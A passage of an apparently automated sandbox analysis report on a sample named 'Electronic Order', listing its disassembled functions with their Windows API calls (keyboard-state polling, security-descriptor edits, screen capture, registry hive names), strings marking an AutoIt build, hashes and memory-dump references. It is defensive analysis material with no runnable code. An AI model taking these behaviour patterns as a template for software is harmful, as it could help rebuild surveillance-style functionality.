                                      Function 00E2DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 00E2DC7B
                                      • _wcscat.LIBCMT ref: 00E2DC93
                                      • _wcscat.LIBCMT ref: 00E2DCA5
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E2DCBA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2DCCE
                                      • GetFileAttributesW.KERNEL32(?), ref: 00E2DCE6
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E2DD00
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2DD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      • Opcode ID: 0402fe853e522d3bcff61f74496c1f7cfa25d637b83ce1eaf0669ab4e95b6a0a
                                      • Instruction ID: 9cb089f26080ea8d7b3a968a659830cfc07dde6e073c7b8accad71ef2b918b97
                                      • Opcode Fuzzy Hash: 0402fe853e522d3bcff61f74496c1f7cfa25d637b83ce1eaf0669ab4e95b6a0a
                                      • Instruction Fuzzy Hash: 7681D3715082519FCB20EF24DC559AAB7E8FF88314F19982EF989E7250E670ED44CB62
                                      Function 00E4C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E4C4EC
                                      • GetFocus.USER32 ref: 00E4C4FC
                                      • GetDlgCtrlID.USER32(00000000), ref: 00E4C507
                                      • _memset.LIBCMT ref: 00E4C632
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E4C65D
                                      • GetMenuItemCount.USER32(?), ref: 00E4C67D
                                      • GetMenuItemID.USER32(?,00000000), ref: 00E4C690
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E4C6C4
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E4C70C
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E4C744
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E4C779
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: c768ada1e38ed4aaa08c4eaef5915091cecbe15fdc2b97460e534e05f8b47461
                                      • Instruction ID: 3bcba28d462e9214c790298952f68b9fda002508bdb3c473ae4a9ea350fef142
                                      • Opcode Fuzzy Hash: c768ada1e38ed4aaa08c4eaef5915091cecbe15fdc2b97460e534e05f8b47461
                                      • Instruction Fuzzy Hash: 4481B3705093019FD750DF25E884A6BBBE8FF88718F20552EF999A3291D731D905CFA2
                                      Function 00E183F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                        • Part of subcall function 00E1874A: GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                        • Part of subcall function 00E1874A: GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                        • Part of subcall function 00E1874A: HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                        • Part of subcall function 00E187E7: GetProcessHeap.KERNEL32(00000008,00E18240,00000000,00000000,?,00E18240,?), ref: 00E187F3
                                        • Part of subcall function 00E187E7: HeapAlloc.KERNEL32(00000000,?,00E18240,?), ref: 00E187FA
                                        • Part of subcall function 00E187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E18240,?), ref: 00E1880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E18458
                                      • _memset.LIBCMT ref: 00E1846D
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1848C
                                      • GetLengthSid.ADVAPI32(?), ref: 00E1849D
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E184DA
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E184F6
                                      • GetLengthSid.ADVAPI32(?), ref: 00E18513
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E18522
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E18529
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1854A
                                      • CopySid.ADVAPI32(00000000), ref: 00E18551
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E18582
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E185A8
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E185BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 5b25a2c4fa1844218b3bfb293db6261a464b130239b60cbe766122782f31aa60
                                      • Instruction ID: b71943d124e54ec97f0d6ed26c0de3212923349a052977960abbeaa664f2961a
                                      • Opcode Fuzzy Hash: 5b25a2c4fa1844218b3bfb293db6261a464b130239b60cbe766122782f31aa60
                                      • Instruction Fuzzy Hash: 2F615675A0020AAFDF00DFA1DD44AEEBBBAFF45714F448269E815B7291DB309A45CF60
                                      Function 00E3762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00E376A2
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E376AE
                                      • CreateCompatibleDC.GDI32(?), ref: 00E376BA
                                      • SelectObject.GDI32(00000000,?), ref: 00E376C7
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E3771B
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E37757
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E3777B
                                      • SelectObject.GDI32(00000006,?), ref: 00E37783
                                      • DeleteObject.GDI32(?), ref: 00E3778C
                                      • DeleteDC.GDI32(00000006), ref: 00E37793
                                      • ReleaseDC.USER32(00000000,?), ref: 00E3779E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: ca25718b5f3745899a30078769f6bd4da4b6f41a08b4357c02a5dcfb812371ca
                                      • Instruction ID: 766351ce99a575ed2b9aaba80a0e98bee97b08299fef34a0b5db9d8b6000141e
                                      • Opcode Fuzzy Hash: ca25718b5f3745899a30078769f6bd4da4b6f41a08b4357c02a5dcfb812371ca
                                      • Instruction Fuzzy Hash: 8D515175904209EFCB25CFA9CC89EAEBBB9EF49710F14841DF989A7210D731A845CB60
                                      Function 00DC6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DC6C6C,?,00008000), ref: 00DE0BB7
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DC6D0D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC6E5A
                                        • Part of subcall function 00DC59CD: _wcscpy.LIBCMT ref: 00DC5A05
                                        • Part of subcall function 00DE387D: _iswctype.LIBCMT ref: 00DE3885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-1018226102
                                      • Opcode ID: 4188a4f6864eed722b7328bc4e52d352a498d7cf7893ec0cd9c8d27673f70278
                                      • Instruction ID: bd769db663e13c9efa367d126d514db86631a38d7a71e44d78c47b487d768bb2
                                      • Opcode Fuzzy Hash: 4188a4f6864eed722b7328bc4e52d352a498d7cf7893ec0cd9c8d27673f70278
                                      • Instruction Fuzzy Hash: 6E026B301083469FC724EF24C891EAFBBE5EF95354F14491DF58A972A1DB30E989CB62
                                      Function 00DC45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00DC45F9
                                      • GetMenuItemCount.USER32(00E86890), ref: 00DFD7CD
                                      • GetMenuItemCount.USER32(00E86890), ref: 00DFD87D
                                      • GetCursorPos.USER32(?), ref: 00DFD8C1
                                      • SetForegroundWindow.USER32(00000000), ref: 00DFD8CA
                                      • TrackPopupMenuEx.USER32(00E86890,00000000,?,00000000,00000000,00000000), ref: 00DFD8DD
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DFD8E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: cff7d631f948d82514c43181df0a3e6b0631494718c65ea1223485844067c442
                                      • Instruction ID: 68aa801549692f54e19c784c29800a23ee35f0b1f23ab3b79ddb75373bc8e890
                                      • Opcode Fuzzy Hash: cff7d631f948d82514c43181df0a3e6b0631494718c65ea1223485844067c442
                                      • Instruction Fuzzy Hash: A571263164020ABEEB319F55DC45FBABF66FF05764F24821AF615AA1E0C7B19C10DBA0
                                      Function 00E38BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E38BEC
                                      • CoInitialize.OLE32(00000000), ref: 00E38C19
                                      • CoUninitialize.OLE32 ref: 00E38C23
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00E38D23
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E38E50
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E52C0C), ref: 00E38E84
                                      • CoGetObject.OLE32(?,00000000,00E52C0C,?), ref: 00E38EA7
                                      • SetErrorMode.KERNEL32(00000000), ref: 00E38EBA
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E38F3A
                                      • VariantClear.OLEAUT32(?), ref: 00E38F4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID: ,,
                                      • API String ID: 2395222682-1556401989
                                      • Opcode ID: c43b372652c0b6ecd268224bab1060aec2e4b8caa16e4fe08089ec74c1ecf36d
                                      • Instruction ID: a721eda8a577dd0fd04fe33797144ce0aaa2636b4bcf5820b726777d038948dd
                                      • Opcode Fuzzy Hash: c43b372652c0b6ecd268224bab1060aec2e4b8caa16e4fe08089ec74c1ecf36d
                                      • Instruction Fuzzy Hash: DBC15571208305AFC700DF64C98892BBBE9FF89708F00595DF58AAB251DB71ED06CB62
                                      Function 00E410A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      • Opcode ID: dce0f73992a10d29487e16699be6897e6a5b3a5f2cbd8ff8885dbf66f0da0f60
                                      • Instruction ID: 1b1f21aec8106d7f5090093bb2d11e2a00caeecdc2b333e79617bcc5c7763fc2
                                      • Opcode Fuzzy Hash: dce0f73992a10d29487e16699be6897e6a5b3a5f2cbd8ff8885dbf66f0da0f60
                                      • Instruction Fuzzy Hash: 8C416F3015128E8BCF10EF91EC91AEA3B24FF51314F505498FD95AB691DB70AD9ACB70
                                      Function 00E25569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00DC7A84: _memmove.LIBCMT ref: 00DC7B0D
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E255D2
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E255E8
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E255F9
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E2560B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E2561C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      • Opcode ID: e4fbcf6b1e495c85273bb1314cefdff03bf1e1d253092f1e1e943707a2fc9d98
                                      • Instruction ID: 95b4b52f4efa9b2eba47d27840ea9f165e1e2d4db1239087953b53071df6ad92
                                      • Opcode Fuzzy Hash: e4fbcf6b1e495c85273bb1314cefdff03bf1e1d253092f1e1e943707a2fc9d98
                                      • Instruction Fuzzy Hash: FF11602155026A79E720BAA2DC8AEFF7B7CEFD1B00F485469B419B70D1DEA01D05CAB1
                                      Function 00E248F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      • Opcode ID: afd48edb933211d6c8c0b4c7905d97b8f24ad793698f96491ed0541a0eaecd68
                                      • Instruction ID: 1a91bf94fb8067f2f5f79f99577ee386dd2a6a2fec72a364d18ed50c0c78569a
                                      • Opcode Fuzzy Hash: afd48edb933211d6c8c0b4c7905d97b8f24ad793698f96491ed0541a0eaecd68
                                      • Instruction Fuzzy Hash: 69110575904125AFDB24EB21EC4AEEF77ACDF81B10F040176F405B6091EF749AC68671
                                      Function 00E25217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00E2521C
                                        • Part of subcall function 00DE0719: timeGetTime.WINMM(?,7694B400,00DD0FF9), ref: 00DE071D
                                      • Sleep.KERNEL32(0000000A), ref: 00E25248
                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E2526C
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E2528E
                                      • SetActiveWindow.USER32 ref: 00E252AD
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E252BB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E252DA
                                      • Sleep.KERNEL32(000000FA), ref: 00E252E5
                                      • IsWindow.USER32 ref: 00E252F1
                                      • EndDialog.USER32(00000000), ref: 00E25302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: ac34d1c9ed07f982834f62529d31d03c6283b49632fc624b33634247504d6419
                                      • Instruction ID: cb31d47b66461e8e449b2aa71a8fe30cdd632e26991dcd9745e38172a2995ad9
                                      • Opcode Fuzzy Hash: ac34d1c9ed07f982834f62529d31d03c6283b49632fc624b33634247504d6419
                                      • Instruction Fuzzy Hash: 3121C676104714EFE7005B32FE89B263B6AEB4679AF103474F009B11B1DBB59C498B71
                                      Function 00E2D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CoInitialize.OLE32(00000000), ref: 00E2D855
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E2D8E8
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00E2D8FC
                                      • CoCreateInstance.OLE32(00E52D7C,00000000,00000001,00E7A89C,?), ref: 00E2D948
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E2D9B7
                                      • CoTaskMemFree.OLE32(?,?), ref: 00E2DA0F
                                      • _memset.LIBCMT ref: 00E2DA4C
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00E2DA88
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E2DAAB
                                      • CoTaskMemFree.OLE32(00000000), ref: 00E2DAB2
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E2DAE9
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00E2DAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 3721a864ac592a96d707eeecc0849345c6d684ce94c5579ce7e22e95e3971bdf
                                      • Instruction ID: a07c947cfaa74773b311b6659037334cfac278c9058d2f07e524dc050eccaa99
                                      • Opcode Fuzzy Hash: 3721a864ac592a96d707eeecc0849345c6d684ce94c5579ce7e22e95e3971bdf
                                      • Instruction Fuzzy Hash: 48B10B75A00119AFDB04DF65DC88EAEBBF9EF48304B1484A9F909EB251DB30ED45CB60
                                      Function 00E2052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00E205A7
                                      • SetKeyboardState.USER32(?), ref: 00E20612
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E20632
                                      • GetKeyState.USER32(000000A0), ref: 00E20649
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E20678
                                      • GetKeyState.USER32(000000A1), ref: 00E20689
                                      • GetAsyncKeyState.USER32(00000011), ref: 00E206B5
                                      • GetKeyState.USER32(00000011), ref: 00E206C3
                                      • GetAsyncKeyState.USER32(00000012), ref: 00E206EC
                                      • GetKeyState.USER32(00000012), ref: 00E206FA
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E20723
                                      • GetKeyState.USER32(0000005B), ref: 00E20731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
